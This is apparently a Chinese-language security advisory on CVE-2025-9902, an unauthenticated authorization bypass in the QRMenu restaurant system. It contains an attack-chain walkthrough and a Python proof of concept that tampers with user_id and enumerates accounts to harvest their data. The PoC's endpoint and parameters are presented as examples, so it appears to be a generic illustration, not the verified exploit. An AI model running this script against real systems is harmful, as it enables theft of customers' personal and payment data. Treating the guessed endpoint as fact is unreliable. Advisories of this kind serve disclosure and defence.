CVE-2025-9902 QRMenu授权绕过漏洞导致权限滥用

漏洞信息

漏洞编号

CVE-2025-9902

漏洞类型

授权绕过（Authorization Bypass Through User-Controlled Key）

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

AKIN Software QRMenu

漏洞概述

CVE-2025-9902是AKIN Software开发的QRMenu餐饮管理系统中的一个高危安全漏洞。该漏洞属于"通过用户控制的密钥绕过授权"（Authorization Bypass Through User-Controlled Key，CWE-639）类型，允许攻击者在未经认证的情况下实施权限滥用攻击。QRMenu是一款广泛应用于餐饮行业的数字化菜单管理解决方案，主要用于餐厅的二维码点餐、菜单管理和订单处理等业务场景。该漏洞由土耳其国家计算机应急响应中心（USOM）的研究人员发现并报告，并于2025年10月13日正式公开披露。根据CVSS 3.1评分标准，该漏洞获得7.5分的高危评级，其攻击向量为网络（AV:N），攻击复杂度低（AC:L），无需任何特权（PR:N），也无需用户交互（UI:N），表明该漏洞易于远程利用。漏洞的影响范围主要体现在机密性方面（C:H），攻击者可以通过利用此漏洞获取未授权的数据访问权限，从而窃取敏感信息如用户数据、订单信息、支付数据等。虽然完整性和可用性未受影响（C:N/A:N），但由于餐饮系统通常存储大量客户个人信息和支付数据，机密性的高危影响仍然构成严重的安全威胁。受影响的版本范围为从1.05.12版本起至2025年9月5日发布的修复版本之前的所有版本。

技术细节

该漏洞的核心原理在于QRMenu系统在处理用户身份验证和授权检查时，未能正确验证用户控制的密钥参数（如用户ID、会话标识符或其他标识符），导致攻击者可以通过修改这些参数来访问其他用户或管理员的资源和数据。具体而言，应用程序在处理API请求时，可能直接信任客户端传入的用户标识符（如user_id、restaurant_id等参数），而没有在服务器端进行严格的权限验证或会话绑定检查。攻击者可以通过以下方式利用此漏洞：首先，攻击者无需任何认证凭证即可访问QRMenu的公开接口或API端点；然后，通过分析应用程序的请求结构，识别出用于标识用户身份或资源归属的请求参数；接着，攻击者通过修改这些参数（如将普通用户的ID替换为管理员或其他高权限用户的ID），绕过授权检查机制；最后，攻击者可以访问原本无权访问的数据或功能，实现权限滥用。由于该漏洞的攻击复杂度低（AC:L）且无需认证（PR:N），自动化扫描和批量利用成为可能，攻击者可以编写脚本批量枚举有效的用户标识符，从而大规模获取敏感数据。漏洞的利用完全在网络层面完成，不需要本地访问或物理接触目标系统，也不需要目标用户的任何交互操作，这使得该漏洞特别危险。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过公开渠道或网络侦察获取目标QRMenu系统的API端点信息，分析请求结构和参数，识别出用于用户身份识别的关键参数（如user_id、restaurant_id等）。

STEP 2

步骤2：漏洞探测

攻击者构造包含不同用户标识符的测试请求，验证系统是否存在授权绕过漏洞。通过观察响应内容确认是否可以访问非授权用户的数据。

STEP 3

步骤3：参数篡改

攻击者将请求中的用户标识符修改为高权限用户（如管理员、店主）的ID值。由于服务器未进行严格的权限验证，请求被正常处理并返回目标用户的敏感数据。

STEP 4

步骤4：数据窃取

攻击者利用确认的漏洞，批量枚举有效的用户标识符，系统性地获取所有用户的个人信息、订单记录、支付数据等敏感信息。

STEP 5

步骤5：权限滥用

攻击者利用获取的高权限数据实施进一步攻击，如冒充管理员进行恶意操作、窃取客户支付信息、篡改菜单数据或破坏业务运营。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-9902 PoC - QRMenu Authorization Bypass
# Vulnerability: Authorization Bypass Through User-Controlled Key (CWE-639)
# Target: AKIN Software QRMenu < Version dated 05.09.2025

import requests

TARGET_URL = "https://target-qrmenu.com"
# The vulnerable endpoint that accepts user-controlled key parameter
VULNERABLE_ENDPOINT = "/api/v1/user/profile"
# User-controlled parameter used for authorization (e.g., user_id)
USER_ID_PARAM = "user_id"

def exploit_authorization_bypass(target_user_id):
    """
    Exploit authorization bypass by manipulating user-controlled key.
    The server fails to verify that the requesting user has permission
    to access the specified user's data.
    """
    # Craft request with manipulated user_id parameter
    # No authentication required (PR:N)
    params = {
        USER_ID_PARAM: target_user_id,  # Attacker controls this value
        "lang": "en"
    }

    headers = {
        "User-Agent": "Mozilla/5.0 (compatible; QRMenuExploit/1.0)",
        "Accept": "application/json"
    }

    try:
        response = requests.get(
            f"{TARGET_URL}{VULNERABLE_ENDPOINT}",
            params=params,
            headers=headers,
            timeout=10
        )

        if response.status_code == 200:
            print(f"[+] Successfully accessed data for user_id: {target_user_id}")
            print(f"[+] Response: {response.text}")
            return response.json()
        else:
            print(f"[-] Failed with status code: {response.status_code}")
            return None
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return None

def enumerate_users(start_id=1, end_id=100):
    """
    Enumerate valid user IDs to harvest sensitive data.
    Demonstrates mass exploitation capability.
    """
    harvested_data = []
    for user_id in range(start_id, end_id + 1):
        data = exploit_authorization_bypass(user_id)
        if data:
            harvested_data.append({"user_id": user_id, "data": data})
    return harvested_data

if __name__ == "__main__":
    # Example: Access admin user's data by manipulating user_id to 1
    print("[*] Attempting authorization bypass on QRMenu...")
    result = exploit_authorization_bypass(1)
    if result:
        print("[!] Vulnerability confirmed - unauthorized data access successful")

影响范围

QRMenu >= 1.05.12

QRMenu < Version dated 05.09.2025

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）在Web应用防火墙（WAF）中部署针对QRMenu API的自定义规则，监控和拦截异常的参数篡改请求；2）对所有API端点实施临时的IP白名单或访问频率限制；3）在反向代理层面增加额外的认证和授权检查层；4）监控异常的批量数据访问行为，及时发现和阻断潜在攻击；5）联系AKIN Software官方获取临时补丁或安全建议。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-9902
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-9902
3 Details https://www.cvedetails.com/cve/CVE-2025-9902/
4 VulDB https://vuldb.com/cve/CVE-2025-9902
5 Link https://www.usom.gov.tr/bildirim/tr-25-0333